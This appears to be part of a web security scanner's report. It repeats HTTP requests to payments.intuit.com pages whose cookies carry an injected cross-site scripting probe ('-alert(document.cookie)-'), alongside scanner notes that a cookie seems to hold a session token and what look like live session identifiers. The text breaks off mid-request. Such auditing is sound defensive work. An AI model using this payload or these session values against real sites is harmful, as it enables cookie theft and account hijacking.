abTestGroup=T16;
Request
GET /products/quickbooks-payment-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Request
GET /products/quickbooks-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Request
GET /products/quickbooks-payment-solutions/ach.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Request
GET /products/quickbooks-payment-solutions/credit-card-processing-services.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Request
GET /products/quickbooks-payment-solutions/custom-gift-card-program.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Request
GET /products/quickbooks-payment-solutions/online-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Request
GET /products/quickbooks-payment-solutions/point-of-sale-solutions.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Request
GET /products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Request
GET /products/quickbooks-payment-solutions/quickbooks-online-billing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-payment-solutions/web-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sbweb/common/includes/header/super_navigation/includes/search.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /support/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /support/glossary.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?launchHelpMeChoose=true HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /apply-now/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /apply-now/check-warranty-apply-now.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /apply-now/contact-me.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
